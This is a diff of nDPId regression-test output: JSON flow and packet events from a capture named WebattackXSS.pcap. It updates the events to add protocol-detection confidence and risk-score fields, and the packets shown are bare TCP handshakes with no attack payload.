 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347531303,"flow_last_seen":1499347536759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347532560,"flow_last_seen":1499347537760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347532560,"flow_last_seen":1499347537760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347532560,"flow_last_seen":1499347537760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347659123,"flow_last_seen":1499347659123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347659123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1499347659123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347659123,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8x6pAAD4G\/iWsEAABwKgKMuikAFB+qkyDAAAAAKACchAefQAAAgQFtAQCCAoBO4spAAAAAAEDAwc="}
@@ -2322,17 +2322,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1499347668069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347668069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TE1AAD4GeYOsEAABwKgKMukCAFANB9+oAAAAAKACchDz4AAAAgQFtAQCCAoBO5PlAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":2,"flow_last_seen":1499347668069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347668069,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6QI2lo7HDQffqaAScSDGIgAAAgQFtAQCCAoD5WVaATuT5QEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5866,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":3,"flow_last_seen":1499347668070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347668070,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TE5AAD4GeYqsEAABwKgKMukCAFANB9+pNpaOyIAQAOVlKQAAAQEICgE7k+YD5WVa"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347535081,"flow_last_seen":1499347540761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347535081,"flow_last_seen":1499347540761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347535081,"flow_last_seen":1499347540761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347536332,"flow_last_seen":1499347541761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347536332,"flow_last_seen":1499347541761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347536332,"flow_last_seen":1499347541761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347537591,"flow_last_seen":1499347542762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347537591,"flow_last_seen":1499347542762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347537591,"flow_last_seen":1499347542762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347540145,"flow_last_seen":1499347545763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347540145,"flow_last_seen":1499347545763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347540145,"flow_last_seen":1499347545763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347541398,"flow_last_seen":1499347546763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347541398,"flow_last_seen":1499347546763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347541398,"flow_last_seen":1499347546763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347542648,"flow_last_seen":1499347547763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347542648,"flow_last_seen":1499347547763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347542648,"flow_last_seen":1499347547763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347669336,"flow_last_seen":1499347669336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347669336,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1499347669336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347669336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XbZAAD4GaBqsEAABwKgKMukQAFClPsiUAAAAAKACchBxcgAAAgQFtAQCCAoBO5UiAAAAAAEDAwc="}
@@ -2358,22 +2358,22 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1499347678198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347678198,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86nhAAD4G21esEAABwKgKMuluAFCn23eyAAAAAKACchC2sQAAAgQFtAQCCAoBO53KAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":2,"flow_last_seen":1499347678198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347678198,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6W5MMi3pp9t3s6AScSDKUAAAAgQFtAQCCAoD5W8\/ATudygEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":3,"flow_last_seen":1499347678199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347678199,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06nlAAD4G216sEAABwKgKMuluAFCn23ezTDIt6oAQAOVpWAAAAQEICgE7ncoD5W8\/"}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347484263,"flow_last_seen":1499347551239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":747,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347484263,"flow_last_seen":1499347551239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":747,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347546427,"flow_last_seen":1499347551497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347546427,"flow_last_seen":1499347551497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347546427,"flow_last_seen":1499347551497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347550209,"flow_last_seen":1499347555765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347550209,"flow_last_seen":1499347555765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347550209,"flow_last_seen":1499347555765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347551495,"flow_last_seen":1499347556766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347551495,"flow_last_seen":1499347556766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
